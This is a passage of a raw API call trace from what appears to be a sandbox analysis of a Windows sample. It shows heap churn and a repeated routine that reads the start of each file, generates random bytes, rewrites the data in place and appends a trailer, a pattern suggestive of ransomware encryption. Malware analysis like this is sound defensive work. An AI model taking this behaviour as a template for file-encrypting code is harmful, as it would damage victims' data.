hHeap=0x4f10000) returned 1 [0085.607] GetProcessHeap () returned 0x4f10000 [0085.607] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x8) returned 0x7d12378 [0085.607] GetProcessHeap () returned 0x4f10000 [0085.607] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d12368 | out: hHeap=0x4f10000) returned 1 [0085.607] GetProcessHeap () returned 0x4f10000 [0085.607] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x8) returned 0x7d12368 [0085.607] GetProcessHeap () returned 0x4f10000 [0085.607] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d12378 | out: hHeap=0x4f10000) returned 1 [0085.607] GetProcessHeap () returned 0x4f10000 [0085.607] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x8) returned 0x7d12378 [0085.607] GetProcessHeap () returned 0x4f10000 [0085.607] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d12368 | out: hHeap=0x4f10000) returned 1 [0085.607] GetProcessHeap () returned 0x4f10000 [0085.607] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x8) returned 0x7d12368 [0085.607] GetProcessHeap () returned 0x4f10000 [0085.607] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d12378 | out: hHeap=0x4f10000) returned 1 [0085.607] GetProcessHeap () returned 0x4f10000 [0085.607] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x24) returned 0x7d4bb68 [0085.607] GetProcessHeap () returned 0x4f10000 [0085.607] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d12368 | out: hHeap=0x4f10000) returned 1 [0085.607] GetProcessHeap () returned 0x4f10000 [0085.607] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x40) returned 0x7d51418 [0085.607] GetProcessHeap () returned 0x4f10000 [0085.607] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d4bb68 | out: hHeap=0x4f10000) returned 1 [0085.607] GetProcessHeap () returned 0x4f10000 [0085.607] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x80) returned 0x4f70a70 [0085.607] GetProcessHeap () returned 0x4f10000 [0085.607] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d51418 | out: hHeap=0x4f10000) returned 1 [0085.608] GetProcessHeap () returned 0x4f10000 [0085.608] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x100) returned 0x7d7f878 [0085.608] GetProcessHeap () returned 0x4f10000 [0085.608] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x4f70a70 | out: hHeap=0x4f10000) returned 1 [0085.608] GetProcessHeap () returned 0x4f10000 [0085.608] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x200) returned 0x7d397d0 [0085.608] GetProcessHeap () returned 0x4f10000 [0085.608] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d7f878 | out: hHeap=0x4f10000) returned 1 [0085.608] GetProcessHeap () returned 0x4f10000 [0085.608] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x200) returned 0x7d395c8 [0085.608] GetProcessHeap () returned 0x4f10000 [0085.608] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d397d0 | out: hHeap=0x4f10000) returned 1 [0085.608] GetProcessHeap () returned 0x4f10000 [0085.608] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x200) returned 0x7d397d0 [0085.608] GetProcessHeap () returned 0x4f10000 [0085.608] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d395c8 | out: hHeap=0x4f10000) returned 1 [0085.608] GetProcessHeap () returned 0x4f10000 [0085.608] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x200) returned 0x7d395c8 [0085.608] GetProcessHeap () returned 0x4f10000 [0085.608] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d397d0 | out: hHeap=0x4f10000) returned 1 [0085.608] GetProcessHeap () returned 0x4f10000 [0085.608] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x200) returned 0x7d397d0 [0085.608] GetProcessHeap () returned 0x4f10000 [0085.608] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d395c8 | out: hHeap=0x4f10000) returned 1 [0085.608] GetProcessHeap () returned 0x4f10000 [0085.608] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x200) returned 0x7d395c8 [0085.608] GetProcessHeap () returned 0x4f10000 [0085.608] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d397d0 | out: hHeap=0x4f10000) returned 1 [0085.608] GetProcessHeap () returned 0x4f10000 [0085.609] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x200) returned 0x7d397d0 [0085.609] GetProcessHeap () returned 0x4f10000 [0085.609] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d395c8 | out: hHeap=0x4f10000) returned 1 [0085.609] GetProcessHeap () returned 0x4f10000 [0085.609] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x200) returned 0x7d395c8 [0085.609] GetProcessHeap () returned 0x4f10000 [0085.609] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d397d0 | out: hHeap=0x4f10000) returned 1 [0085.609] GetProcessHeap () returned 0x4f10000 [0085.609] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x200) returned 0x7d397d0 [0085.609] GetProcessHeap () returned 0x4f10000 [0085.609] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d395c8 | out: hHeap=0x4f10000) returned 1 [0085.609] GetProcessHeap () returned 0x4f10000 [0085.609] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x200) returned 0x7d395c8 [0085.609] GetProcessHeap () returned 0x4f10000 [0085.609] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d397d0 | out: hHeap=0x4f10000) returned 1 [0085.609] GetProcessHeap () returned 0x4f10000 [0085.609] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x200) returned 0x7d397d0 [0085.609] GetProcessHeap () returned 0x4f10000 [0085.609] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d395c8 | out: hHeap=0x4f10000) returned 1 [0085.609] GetProcessHeap () returned 0x4f10000 [0085.609] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x200) returned 0x7d395c8 [0085.609] GetProcessHeap () returned 0x4f10000 [0085.609] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d397d0 | out: hHeap=0x4f10000) returned 1 [0085.609] GetProcessHeap () returned 0x4f10000 [0085.609] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x200) returned 0x7d397d0 [0085.609] GetProcessHeap () returned 0x4f10000 [0085.609] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d395c8 | out: hHeap=0x4f10000) returned 1 [0085.610] GetProcessHeap () returned 0x4f10000 [0085.610] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x220) returned 0x7cf6bf8 [0085.610] GetProcessHeap () returned 0x4f10000 [0085.610] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d397d0 | out: hHeap=0x4f10000) returned 1 [0085.610] GetProcessHeap () returned 0x4f10000 [0085.610] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d12358 | out: hHeap=0x4f10000) returned 1 [0085.610] GetProcessHeap () returned 0x4f10000 [0085.610] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d56898 | out: hHeap=0x4f10000) returned 1 [0085.610] GetProcessHeap () returned 0x4f10000 [0085.610] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7cf6bf8 | out: hHeap=0x4f10000) returned 1 [0085.610] GetProcessHeap () returned 0x4f10000 [0085.610] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d56528 | out: hHeap=0x4f10000) returned 1 [0085.610] SetFilePointerEx (in: hFile=0x9cc, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0085.610] WriteFile (in: hFile=0x9cc, lpBuffer=0x7d7f770*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x758fd44, lpOverlapped=0x0 | out: lpBuffer=0x7d7f770*, lpNumberOfBytesWritten=0x758fd44*=0x100, lpOverlapped=0x0) returned 1 [0085.610] WriteFile (in: hFile=0x9cc, lpBuffer=0x758fd48*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x758fd44, lpOverlapped=0x0 | out: lpBuffer=0x758fd48*, lpNumberOfBytesWritten=0x758fd44*=0x4, lpOverlapped=0x0) returned 1 [0085.610] GetProcessHeap () returned 0x4f10000 [0085.610] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x8b600d0 | out: hHeap=0x4f10000) returned 1 [0085.610] GetProcessHeap () returned 0x4f10000 [0085.610] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d56870 | out: hHeap=0x4f10000) returned 1 [0085.610] GetProcessHeap () returned 0x4f10000 [0085.610] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d7f770 | out: hHeap=0x4f10000) returned 1 [0085.610] CloseHandle (hObject=0x9cc) returned 1 [0085.612] InterlockedExchangeAdd (in: Addend=0x40f168, Value=1 | out: Addend=0x40f168) returned 149 [0085.612] SetFilePointerEx (in: hFile=0x9d0, liDistanceToMove=0xfffffffc, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0085.612] ReadFile (in: hFile=0x9d0, lpBuffer=0x758fd4c, nNumberOfBytesToRead=0x4, lpNumberOfBytesRead=0x758fd08, lpOverlapped=0x0 | out: lpBuffer=0x758fd4c*, lpNumberOfBytesRead=0x758fd08*=0x0, lpOverlapped=0x0) returned 1 [0085.612] SetFilePointerEx (in: hFile=0x9d0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0085.612] GetProcessHeap () returned 0x4f10000 [0085.612] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x100) returned 0x7d7f770 [0085.612] GetProcessHeap () returned 0x4f10000 [0085.612] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x20) returned 0x7d56870 [0085.612] SystemFunction036 (in: RandomBuffer=0x7d56870, RandomBufferLength=0x20 | out: RandomBuffer=0x7d56870) returned 1 [0085.612] GetProcessHeap () returned 0x4f10000 [0085.612] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x8, Size=0x1000) returned 0x8b600d0 [0085.612] ReadFile (in: hFile=0x9d0, lpBuffer=0x8b600d0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x758fd08, lpOverlapped=0x0 | out: lpBuffer=0x8b600d0*, lpNumberOfBytesRead=0x758fd08*=0x1000, lpOverlapped=0x0) returned 1 [0085.660] SetFilePointerEx (in: hFile=0x9d0, liDistanceToMove=0xfffff000, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0085.660] WriteFile (in: hFile=0x9d0, lpBuffer=0x8b600d0*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x758fd44, lpOverlapped=0x0 | out: lpBuffer=0x8b600d0*, lpNumberOfBytesWritten=0x758fd44*=0x1000, lpOverlapped=0x0) returned 1 [0085.660] GetProcessHeap () returned 0x4f10000 [0085.660] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x8, Size=0x4) returned 0x7d12358 [0085.660] GetProcessHeap () returned 0x4f10000 [0085.660] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x8, Size=0x4) returned 0x7d12368 [0085.660] GetProcessHeap () returned 0x4f10000 [0085.660] RtlReAllocateHeap (Heap=0x4f10000, Flags=0x8, Ptr=0x7d12368, Size=0x20) returned 0x7d56528 [0085.660] GetProcessHeap () returned 0x4f10000 [0085.660] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x8, Size=0x4) returned 0x7d12368 [0085.660] GetProcessHeap () returned 0x4f10000 [0085.660] RtlReAllocateHeap (Heap=0x4f10000, Flags=0x0, Ptr=0x7d12368, Size=0x20) returned 0x7d56898 [0085.661] GetProcessHeap () returned 0x4f10000 [0085.661] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x8, Size=0x4) returned 0x7d12368 [0085.661] GetProcessHeap () returned 0x4f10000 [0085.661] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x8) returned 0x7d12378 [0085.661] GetProcessHeap () returned 0x4f10000 [0085.661] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d12368 | out: hHeap=0x4f10000) returned 1 [0085.661] GetProcessHeap () returned 0x4f10000 [0085.661] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x8) returned 0x7d12368 [0085.661] GetProcessHeap () returned 0x4f10000 [0085.661] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d12378 | out: hHeap=0x4f10000) returned 1 [0085.661] GetProcessHeap () returned 0x4f10000 [0085.661] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x8) returned 0x7d12378 [0085.661] GetProcessHeap () returned 0x4f10000 [0085.661] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d12368 | out: hHeap=0x4f10000) returned 1 [0085.661] GetProcessHeap () returned 0x4f10000 [0085.661] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x8) returned 0x7d12368 [0085.661] GetProcessHeap () returned 0x4f10000 [0085.661] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d12378 | out: hHeap=0x4f10000) returned 1 [0085.661] GetProcessHeap () returned 0x4f10000 [0085.661] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x8) returned 0x7d12378 [0085.661] GetProcessHeap () returned 0x4f10000 [0085.661] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d12368 | out: hHeap=0x4f10000) returned 1 [0085.661] GetProcessHeap () returned 0x4f10000 [0085.661] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x8) returned 0x7d12368 [0085.661] GetProcessHeap () returned 0x4f10000 [0085.661] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d12378 | out: hHeap=0x4f10000) returned 1 [0085.661] GetProcessHeap () returned 0x4f10000 [0085.661] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x8) returned 0x7d12378 [0085.661] GetProcessHeap () returned 0x4f10000 [0085.661] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d12368 | out: hHeap=0x4f10000) returned 1 [0085.661] GetProcessHeap () returned 0x4f10000 [0085.661] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x8) returned 0x7d12368 [0085.661] GetProcessHeap () returned 0x4f10000 [0085.661] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d12378 | out: hHeap=0x4f10000) returned 1 [0085.661] GetProcessHeap () returned 0x4f10000 [0085.661] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x8) returned 0x7d12378 [0085.661] GetProcessHeap () returned 0x4f10000 [0085.661] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d12368 | out: hHeap=0x4f10000) returned 1 [0085.661] GetProcessHeap () returned 0x4f10000 [0085.662] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x8) returned 0x7d12368 [0085.662] GetProcessHeap () returned 0x4f10000 [0085.662] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d12378 | out: hHeap=0x4f10000) returned 1 [0085.662] GetProcessHeap () returned 0x4f10000 [0085.662] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x8) returned 0x7d12378 [0085.662] GetProcessHeap () returned 0x4f10000 [0085.662] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d12368 | out: hHeap=0x4f10000) returned 1 [0085.662] GetProcessHeap () returned 0x4f10000 [0085.662] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x8) returned 0x7d12368 [0085.662] GetProcessHeap () returned 0x4f10000 [0085.662] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d12378 | out: hHeap=0x4f10000) returned 1 [0085.662] GetProcessHeap () returned 0x4f10000 [0085.662] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x8) returned 0x7d12378 [0085.662] GetProcessHeap () returned 0x4f10000 [0085.662] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d12368 | out: hHeap=0x4f10000) returned 1 [0085.662] GetProcessHeap () returned 0x4f10000 [0085.662] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x8) returned 0x7d12368 [0085.662] GetProcessHeap () returned 0x4f10000 [0085.662] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d12378 | out: hHeap=0x4f10000) returned 1 [0085.662] GetProcessHeap () returned 0x4f10000 [0085.662] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x8) returned 0x7d12378 [0085.662] GetProcessHeap () returned 0x4f10000 [0085.662] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d12368 | out: hHeap=0x4f10000) returned 1 [0085.662] GetProcessHeap () returned 0x4f10000 [0085.662] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x8) returned 0x7d12368 [0085.662] GetProcessHeap () returned 0x4f10000 [0085.662] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d12378 | out: hHeap=0x4f10000) returned 1 [0085.662] GetProcessHeap () returned 0x4f10000 [0085.662] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x24) returned 0x7d4bb68 [0085.662] GetProcessHeap () returned 0x4f10000 [0085.662] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d12368 | out: hHeap=0x4f10000) returned 1 [0085.662] GetProcessHeap () returned 0x4f10000 [0085.662] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x40) returned 0x7d51418 [0085.662] GetProcessHeap () returned 0x4f10000 [0085.662] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d4bb68 | out: hHeap=0x4f10000) returned 1 [0085.662] GetProcessHeap () returned 0x4f10000 [0085.662] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x80) returned 0x4f70a70 [0085.663] GetProcessHeap () returned 0x4f10000 [0085.663] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d51418 | out: hHeap=0x4f10000) returned 1 [0085.663] GetProcessHeap () returned 0x4f10000 [0085.663] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x100) returned 0x7d7f878 [0085.663] GetProcessHeap () returned 0x4f10000 [0085.663] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x4f70a70 | out: hHeap=0x4f10000) returned 1 [0085.663] GetProcessHeap () returned 0x4f10000 [0085.663] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x200) returned 0x7d397d0 [0085.663] GetProcessHeap () returned 0x4f10000 [0085.663] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d7f878 | out: hHeap=0x4f10000) returned 1 [0085.663] GetProcessHeap () returned 0x4f10000 [0085.663] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x200) returned 0x7d395c8 [0085.663] GetProcessHeap () returned 0x4f10000 [0085.663] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d397d0 | out: hHeap=0x4f10000) returned 1 [0085.663] GetProcessHeap () returned 0x4f10000 [0085.663] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x200) returned 0x7d397d0 [0085.663] GetProcessHeap () returned 0x4f10000 [0085.663] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d395c8 | out: hHeap=0x4f10000) returned 1 [0085.663] GetProcessHeap () returned 0x4f10000 [0085.663] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x200) returned 0x7d395c8 [0085.663] GetProcessHeap () returned 0x4f10000 [0085.663] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d397d0 | out: hHeap=0x4f10000) returned 1 [0085.663] GetProcessHeap () returned 0x4f10000 [0085.663] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x200) returned 0x7d397d0 [0085.663] GetProcessHeap () returned 0x4f10000 [0085.663] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d395c8 | out: hHeap=0x4f10000) returned 1 [0085.663] GetProcessHeap () returned 0x4f10000 [0085.663] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x200) returned 0x7d395c8 [0085.663] GetProcessHeap () returned 0x4f10000 [0085.664] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d397d0 | out: hHeap=0x4f10000) returned 1 [0085.664] GetProcessHeap () returned 0x4f10000 [0085.664] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x200) returned 0x7d397d0 [0085.664] GetProcessHeap () returned 0x4f10000 [0085.664] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d395c8 | out: hHeap=0x4f10000) returned 1 [0085.664] GetProcessHeap () returned 0x4f10000 [0085.664] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x200) returned 0x7d395c8 [0085.664] GetProcessHeap () returned 0x4f10000 [0085.664] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d397d0 | out: hHeap=0x4f10000) returned 1 [0085.664] GetProcessHeap () returned 0x4f10000 [0085.664] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x200) returned 0x7d397d0 [0085.664] GetProcessHeap () returned 0x4f10000 [0085.664] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d395c8 | out: hHeap=0x4f10000) returned 1 [0085.664] GetProcessHeap () returned 0x4f10000 [0085.664] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x200) returned 0x7d395c8 [0085.664] GetProcessHeap () returned 0x4f10000 [0085.664] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d397d0 | out: hHeap=0x4f10000) returned 1 [0085.664] GetProcessHeap () returned 0x4f10000 [0085.664] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x200) returned 0x7d397d0 [0085.664] GetProcessHeap () returned 0x4f10000 [0085.664] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d395c8 | out: hHeap=0x4f10000) returned 1 [0085.665] GetProcessHeap () returned 0x4f10000 [0085.665] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x200) returned 0x7d395c8 [0085.665] GetProcessHeap () returned 0x4f10000 [0085.665] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d397d0 | out: hHeap=0x4f10000) returned 1 [0085.665] GetProcessHeap () returned 0x4f10000 [0085.665] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x200) returned 0x7d397d0 [0085.665] GetProcessHeap () returned 0x4f10000 [0085.665] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d395c8 | out: hHeap=0x4f10000) returned 1 [0085.665] GetProcessHeap () returned 0x4f10000 [0085.665] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x220) returned 0x7cf6bf8 [0085.665] GetProcessHeap () returned 0x4f10000 [0085.665] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d397d0 | out: hHeap=0x4f10000) returned 1 [0085.665] GetProcessHeap () returned 0x4f10000 [0085.665] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d12358 | out: hHeap=0x4f10000) returned 1 [0085.665] GetProcessHeap () returned 0x4f10000 [0085.665] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d56898 | out: hHeap=0x4f10000) returned 1 [0085.665] GetProcessHeap () returned 0x4f10000 [0085.665] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7cf6bf8 | out: hHeap=0x4f10000) returned 1 [0085.665] GetProcessHeap () returned 0x4f10000 [0085.665] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d56528 | out: hHeap=0x4f10000) returned 1 [0085.665] SetFilePointerEx (in: hFile=0x9d0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0085.665] WriteFile (in: hFile=0x9d0, lpBuffer=0x7d7f770*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x758fd44, lpOverlapped=0x0 | out: lpBuffer=0x7d7f770*, lpNumberOfBytesWritten=0x758fd44*=0x100, lpOverlapped=0x0) returned 1 [0085.665] WriteFile (in: hFile=0x9d0, lpBuffer=0x758fd48*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x758fd44, lpOverlapped=0x0 | out: lpBuffer=0x758fd48*, lpNumberOfBytesWritten=0x758fd44*=0x4, lpOverlapped=0x0) returned 1 [0085.665] GetProcessHeap () returned 0x4f10000 [0085.665] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x8b600d0 | out: hHeap=0x4f10000) returned 1 [0085.665] GetProcessHeap () returned 0x4f10000 [0085.666] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d56870 | out: hHeap=0x4f10000) returned 1 [0085.666] GetProcessHeap () returned 0x4f10000 [0085.666] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d7f770 | out: hHeap=0x4f10000) returned 1 [0085.666] CloseHandle (hObject=0x9d0) returned 1 [0085.667] InterlockedExchangeAdd (in: Addend=0x40f168, Value=1 | out: Addend=0x40f168) returned 150 [0085.667] SetFilePointerEx (in: hFile=0x9d4, liDistanceToMove=0xfffffffc, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0085.667] ReadFile (in: hFile=0x9d4, lpBuffer=0x758fd4c, nNumberOfBytesToRead=0x4, lpNumberOfBytesRead=0x758fd08, lpOverlapped=0x0 | out: lpBuffer=0x758fd4c*, lpNumberOfBytesRead=0x758fd08*=0x0, lpOverlapped=0x0) returned 1 [0085.667] SetFilePointerEx (in: hFile=0x9d4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0085.667] GetProcessHeap () returned 0x4f10000 [0085.667] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x100) returned 0x7d7f770 [0085.667] GetProcessHeap () returned 0x4f10000 [0085.667] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x20) returned 0x7d56870 [0085.667] SystemFunction036 (in: RandomBuffer=0x7d56870, RandomBufferLength=0x20 | out: RandomBuffer=0x7d56870) returned 1 [0085.667] GetProcessHeap () returned 0x4f10000 [0085.667] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x8, Size=0x1000) returned 0x8b600d0 [0085.667] ReadFile (in: hFile=0x9d4, lpBuffer=0x8b600d0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x758fd08, lpOverlapped=0x0 | out: lpBuffer=0x8b600d0*, lpNumberOfBytesRead=0x758fd08*=0xe55, lpOverlapped=0x0) returned 1 [0085.717] SetFilePointerEx (in: hFile=0x9d4, liDistanceToMove=0xfffff1ab, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0085.717] WriteFile (in: hFile=0x9d4, lpBuffer=0x8b600d0*, nNumberOfBytesToWrite=0xe55, lpNumberOfBytesWritten=0x758fd44, lpOverlapped=0x0 | out: lpBuffer=0x8b600d0*, lpNumberOfBytesWritten=0x758fd44*=0xe55, lpOverlapped=0x0) returned 1 [0085.717] GetProcessHeap () returned 0x4f10000 [0085.717] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x8, Size=0x4) returned 0x7d12358 [0085.717] GetProcessHeap () returned 0x4f10000 [0085.717] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x8, Size=0x4) returned 0x7d12368 [0085.717] GetProcessHeap () returned 0x4f10000 [0085.717] RtlReAllocateHeap (Heap=0x4f10000, Flags=0x8, Ptr=0x7d12368, Size=0x20) returned 0x7d56528 [0085.717] GetProcessHeap () returned 0x4f10000 [0085.717] 